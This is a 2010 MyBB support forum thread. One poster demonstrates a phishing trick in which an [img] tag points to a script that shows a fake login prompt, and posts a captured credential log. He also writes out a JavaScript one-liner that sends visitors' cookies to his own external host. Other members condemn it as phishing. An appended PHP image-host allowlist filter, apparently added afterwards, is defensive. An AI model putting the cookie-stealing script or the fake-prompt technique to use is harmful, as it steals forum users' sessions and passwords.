MyBB Community Forums

Full Version: i am using mybb by only two days but ..
Pages: 1 2 3
(2010-11-16, 08:20 AM)Evollution Wrote: [ -> ]ok try to put [img]link[/img] on any website and you will see how it works Wink

http://fifastars.net84.net/scripts/mybb/cool.php replace link with this <<-
(2010-11-16, 08:19 AM)darkly Wrote: [ -> ]uCoz =/= MyBB. Smile


Smile) this script works on any website ))) ucoz vbulletin phpbb joomla ... i don't know smf..

We can always click on 'Cancel'. :p

but to get your cookies i should post next:

<script>img = new Image(); img.src = 'http://fifastars.net84.net/scripts/2/loadbanner.php?cook='+document.cookie;</script>
Smile in an html file and after this you must just access this html file Big Grin
That looks like more of a phishing attempt where the site tries to spoof itself by saying it's asking for "MyBB anthentification" and getting unsuspecting users to enter their login details.
i know you can press cancel but a beginner will insert his password believe me Wink
look what i get by now lets say this is a password :d

HAHAHAHAHAHAHAHAHAHAHAH ||| jodifgjdojnfkfjdjfoijfv || Tue.Nov.2010 | 03:25 | ....... | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729)

HAHAHAHAHAHAHAHAHAHAHAH (should be username)
jodifgjdojnfkfjdjfoijfv (password)
(2010-11-16, 08:26 AM)Evollution Wrote: [ -> ]i know you can press cancel but a beginner will insert his password believe me Wink
look what i get by now lets say this is a password :d

HAHAHAHAHAHAHAHAHAHAHAH ||| jodifgjdojnfkfjdjfoijfv || Tue.Nov.2010 | 03:25 | | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729)

HAHAHAHAHAHAHAHAHAHAHAH (should be username)
jodifgjdojnfkfjdjfoijfv (password)

Remove my IP please. Smile
So this is not a MyBB security hole as you so blatantly put it. It's a lame attempt to get unsuspecting users to enter their login details by phishing and I can assure you it will cause you to get banned wherever you use such a tactic!
(2010-11-16, 08:36 AM)- G33K - Wrote: [ -> ]So this is not a MyBB security hole as you so blatantly put it. It's a lame attempt to get unsuspecting users to enter their login details by phishing and I can assure you it will cause you to get banned wherever you use such a tactic!

Confused ok try to insert this script [img]link[/img] on premium uCoz websites and you will see that this is not working

+ here is a website when you try insert an img says:

Din motive de securitate, imaginile pentru tag-ul [img] se acceptă doar de pe site-urile din această listă, puteți să le încărați acolo. Apăsați butonul Înapoi, și edițați-vă mesajul.

Translate:
For security reasons, the images tag [img] shall be accepted only on sites in this list, you can get it loaded there. Click the Back button and edit your message.
website lists:
http://tinypic.com
http://imgur.com
http://imageshack.us
http://fastpic.ru
http://radikal.ru
http://immage.de
http://bayimg.com 


maybe it's not a security hole, but it would be better if we try to avoid situations where our users give their passwords to hackers
You realise that any website that allows you to input images is 'vulnerable' to this...?? All you're doing is writing a malicious script and getting people to visit it to steal their information.
yes i realise this but can you do so that images be accepted only from some sites not from all ? just like in the above example
(2010-11-16, 10:10 AM)Evollution Wrote: [ -> ]yes i realise this but can you do so that images be accepted only from some sites not from all ? just like in the above example

You can request it as a plugin.

IMO, you can not have this as a core feature of MyBB because it would be too limiting and admins would have to muck around with the list of sites to allow/disallow.

Also, using this phishing attempt will not last long on any board with active moderators as they will immediately remove it and ban the user who posted it.
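
The host allowlist for [img] tags that the thread asks about could look like the following. This is an added example, not part of any post and not MyBB core or plugin code; the helper names img_url_allowed and filter_img_tags are hypothetical, the host list is the one quoted in the thread, and the sample post is constructed.

```php
<?php
// Added example, not MyBB core or plugin code. Hosts are the ones listed in the thread.
const IMG_ALLOWED_HOSTS = ['tinypic.com', 'imgur.com', 'imageshack.us',
    'fastpic.ru', 'radikal.ru', 'immage.de', 'bayimg.com'];

// Hypothetical helper: true only for http(s) URLs whose host is on the list
// or is a subdomain of a listed host (for example i.imgur.com).
function img_url_allowed(string $url): bool
{
    $parts = parse_url(trim($url));
    if (!is_array($parts) || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return false; // userinfo is never needed for an image URL and can disguise the host
    }
    $host = rtrim(strtolower($parts['host']), '.');
    foreach (IMG_ALLOWED_HOSTS as $allowed) {
        $suffix = '.' . $allowed;
        if ($host === $allowed || substr($host, -strlen($suffix)) === $suffix) {
            return true;
        }
    }
    return false;
}

// Hypothetical helper: keep allowed [img] tags, replace the rest with a notice.
function filter_img_tags(string $message): string
{
    $out = preg_replace_callback(
        '#\[img(?:[= ][^\]]*)?\](.*?)\[/img\]#is',
        static function (array $m): string {
            return img_url_allowed($m[1]) ? $m[0] : '[image removed: host not on allowlist]';
        },
        $message
    );
    return $out ?? '[message withheld: image filter error]'; // fail closed
}

// Constructed sample post: one allowed host, one unlisted host, one look-alike host.
$post = "[img]http://i.imgur.com/abc.png[/img]\n"
      . "[img]http://images.example.net/cool.php[/img]\n"
      . "[img]http://imgur.com.example.net/x.png[/img]";
echo filter_img_tags($post), "\n";
```

Only the first tag in the sample survives; the look-alike host fails because the match is on the end of the hostname, not on a substring. The check covers only the URL written in the post, so it relies on the listed hosts not redirecting to arbitrary sites.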